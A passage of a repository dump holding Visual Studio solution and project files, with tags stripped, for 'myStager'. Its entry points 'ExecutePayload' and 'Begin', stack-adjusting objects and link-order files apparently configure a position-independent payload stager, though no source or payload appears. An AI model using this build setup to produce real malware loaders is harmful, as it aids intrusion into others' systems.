6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "myStager", "myStager.vcxproj", "{C3B4A595-432A-48E5-8FEF-5292C981A6B6}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x64.ActiveCfg = Debug|x64
17 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x64.Build.0 = 
Debug|x64 18 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x86.ActiveCfg = Debug|Win32 19 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Debug|x86.Build.0 = Debug|Win32 20 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x64.ActiveCfg = Release|x64 21 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x64.Build.0 = Release|x64 22 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x86.ActiveCfg = Release|Win32 23 | {C3B4A595-432A-48E5-8FEF-5292C981A6B6}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {4D671D89-B657-4A67-BDED-AD4E904EC736} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /myStager.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {c3b4a595-432a-48e5-8fef-5292c981a6b6} 25 | csstagerexe 26 | 10.0 27 | myStager 28 | 29 | 30 | 31 | Application 32 | true 33 | v143 34 | Unicode 35 | 36 | 37 | Application 38 | false 39 | v143 40 | true 41 | Unicode 42 | 43 | 44 | Application 45 | true 46 | v143 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v143 53 | true 54 | Unicode 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | true 77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 78 | true 79 | 80 | 81 | Console 82 | true 83 | AdjustStack.obj;%(AdditionalDependencies) 84 | 85 | 86 | 87 | 88 | Level4 89 | true 90 | true 91 | true 92 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | false 95 | CompileAsC 96 | MinSpace 97 | true 98 | AssemblyCode 99 | Size 100 | 101 | 102 | Console 103 | true 104 | true 105 | true 
106 | UseLinkTimeCodeGeneration 107 | ExecutePayload 108 | false 109 | true 110 | function_link_order.txt 111 | true 112 | 113 | 114 | 115 | 116 | Level3 117 | true 118 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 119 | true 120 | 121 | 122 | Console 123 | true 124 | %(AdditionalDependencies) 125 | 126 | 127 | 128 | 129 | Level4 130 | true 131 | true 132 | true 133 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 134 | true 135 | false 136 | CompileAsC 137 | Disabled 138 | true 139 | AssemblyCode 140 | Neither 141 | 142 | 143 | Console 144 | true 145 | true 146 | true 147 | UseLinkTimeCodeGeneration 148 | WorkCallback.obj;AdjustStack.obj;%(AdditionalDependencies) 149 | Begin 150 | false 151 | true 152 | function_link_order64.txt 153 | true 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /myStager.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 头文件 20 | 21 | 22 | 头文件 23 | 24 | 25 | 26 | 27 | 源文件 28 | 29 | 30 | -------------------------------------------------------------------------------- /myStager.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | --------------------------------------------------------------------------------